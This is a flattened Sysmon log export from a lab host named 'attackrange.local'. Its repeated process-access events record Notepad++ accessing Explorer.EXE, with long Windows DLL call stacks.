Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.040{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.038{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.038{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001047394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.038{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.037{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.018{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
